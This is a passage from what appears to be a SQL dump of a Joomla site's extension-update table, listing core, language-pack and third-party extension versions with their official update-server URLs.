package','','pkg_akeeba','package','',0,'8.2.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-6.html',''),(34532,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34533,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34534,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34535,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(34536,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(34537,3,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(34538,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(34539,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(34540,3,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.10.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(34541,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(34542,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(34543,3,0,'Danish','','pkg_da-DK','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(34544,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(34545,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(34546,3,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(34547,3,0,'English, Canada','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(34548,3,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(34549,3,0,'English, USA','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(34550,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(34551,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(34552,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(34553,3,0,'French','','pkg_fr-FR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(34554,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(34555,3,0,'German','','pkg_de-DE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(34556,3,0,'German, Austria','','pkg_de-AT','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(34557,3,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(34558,3,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(34559,3,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(34560,3,0,'Greek','','pkg_el-GR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(34561,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(34562,3,0,'Italian','','pkg_it-IT','package','',0,'3.10.11.2','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(34563,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(34564,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(34565,3,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(34566,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(34567,3,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(34568,3,0,'Persian Farsi','','pkg_fa-IR','package','',0,'3.10.11.2','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(34569,3,0,'Polish','','pkg_pl-PL','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(34570,3,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(34571,3,0,'Portuguese, Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(34572,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(34573,3,0,'Russian','','pkg_ru-RU','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(34574,3,0,'Serbian, Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(34575,3,0,'Serbian, Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(34576,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(34577,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(34578,3,0,'Spanish','','pkg_es-ES','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(34579,3,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(34580,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(34581,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(34582,3,0,'Tamil, India','','pkg_ta-IN','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(34583,3,0,'Thai','','pkg_th-TH','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(34584,3,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(34585,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(34586,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(34587,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(34588,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','https://updates.rockettheme.com/joomla/138/b61e70db','',''),(34589,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/138/2084920890','',''),(34590,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','https://updates.rockettheme.com/joomla/286/21ffe006','',''),(34591,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/286/326466299','',''),(34592,20,0,'RokBooster Plugin','','rokbooster','plugin','system',0,'1.1.19','0802','https://updates.rockettheme.com/joomla/287/cb577720','',''),(34593,20,0,'RokBox Plugin','','rokbox','plugin','system',0,'2.0.16','0802','https://updates.rockettheme.com/joomla/301/dfc993d8','',''),(34594,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','https://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(34595,20,0,'RokGallery','','','component','',0,'2.46','0802','https://updates.rockettheme.com/joomla/313/1985305838','',''),(34596,20,0,'RokWeather','','','module','',0,'2.0.4','0802','https://updates.rockettheme.com/joomla/313/1307741342','',''),(34597,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','https://updates.rockettheme.com/joomla/313/1301311221','',''),(34598,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/381/337128173','',''),(34599,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/559/1033ef39','',''),(34600,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(34601,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(34602,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(34603,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(34604,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(34605,57,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.10.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(34606,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(34607,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(34608,57,0,'Danish','','pkg_da-DK','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(34609,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(34610,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(34611,57,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(34612,57,0,'English, Canada','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(34613,57,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(34614,57,0,'English, USA','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(34615,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(34616,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(34617,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(34618,57,0,'French','','pkg_fr-FR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(34619,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(34620,57,0,'German','','pkg_de-DE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(34621,57,0,'German, Austria','','pkg_de-AT','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(34622,57,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(34623,57,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(34624,57,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(34625,57,0,'Greek','','pkg_el-GR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(34626,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(34627,57,0,'Italian','','pkg_it-IT','package','',0,'3.10.11.2','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(34628,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(34629,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(34630,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(34631,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(34632,57,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(34633,57,0,'Persian Farsi','','pkg_fa-IR','package','',0,'3.10.11.2','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(34634,57,0,'Polish','','pkg_pl-PL','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(34635,57,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(34636,57,0,'Portuguese, Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(34637,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(34638,57,0,'Russian','','pkg_ru-RU','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(34639,57,0,'Serbian, Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(34640,57,0,'Serbian, Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(34641,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(34642,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(34643,57,0,'Spanish','','pkg_es-ES','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(34644,57,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(34645,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(34646,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(34647,57,0,'Tamil, India','','pkg_ta-IN','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(34648,57,0,'Thai','','pkg_th-TH','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(34649,57,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(34650,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(34651,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(34652,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(34653,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-6.html',''),(34654,122,0,'Google Structured Data Free','','gsd','plugin','system',0,'5.1.6','','https://static.tassos.gr/update/gsdfree?type=.xml','https://www.tassos.gr/releases/google-structured-data/google-structured-data-5-1-6?format=html',''),(34655,129,0,'JCE 2.9.33','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.33','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-33-released',''),(34656,130,0,'T3 System Plugin','','t3','plugin','system',0,'3.1.2','','http://update.joomlart.com/service/tracking/j16/plg_system_t3.xml','http://www.joomlart.com/update-steps',''),(34657,135,0,' Phoca Gallery ',' Phoca Gallery is an efficient image gallery extension for Joomla! CMS. ','com_phocagallery','component','',1,'4.4.3','','https://raw.githubusercontent.com/PhocaCz/PhocaGallery/master/manifest.xml','http://www.phoca.cz/version/index.php?phocagallery=4.4.3',''),(34658,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34659,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-6.html',''),(34660,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34661,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34662,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34663,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34664,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-6.html',''),(34665,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34666,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34667,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-6.html',''),(34668,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34669,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34670,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34671,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-6.html',''),(34672,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34673,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34674,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34675,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34676,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34677,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34678,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-6.html',''),(34679,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34680,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34681,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34682,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34683,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34684,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-6.html',''),(34685,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34686,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34687,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34688,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34689,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-6.html',''),(34690,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34691,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34692,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34693,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34694,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-6.html',''),(34695,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34696,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34697,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34698,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34699,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-6.html',''),(34700,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34701,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34702,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34703,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-6.html',''),(34704,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34705,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34706,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34707,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34708,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-6.html',''),(34709,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34710,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34711,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-6.html',''),(34712,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34713,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34714,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34715,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-6.html',''),(34716,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34717,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34718,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-6.html',''),(34719,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34720,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34721,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34722,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34723,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.7','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-7.html',''),(34724,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34725,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34726,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34727,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34728,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.7','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-7.html',''),(34729,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34730,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34731,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34732,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34733,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.7','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-7.html',''),(34734,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34735,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34736,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34737,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34738,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.7','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-7.html',''),(34739,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34740,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34741,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34742,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.7','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-7.html',''),(34743,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34744,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34745,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34746,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34747,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.2.7','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-7.html',''),(34748,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34749,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34750,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','',''),(34751,67,0,'Akeeba Backup Core 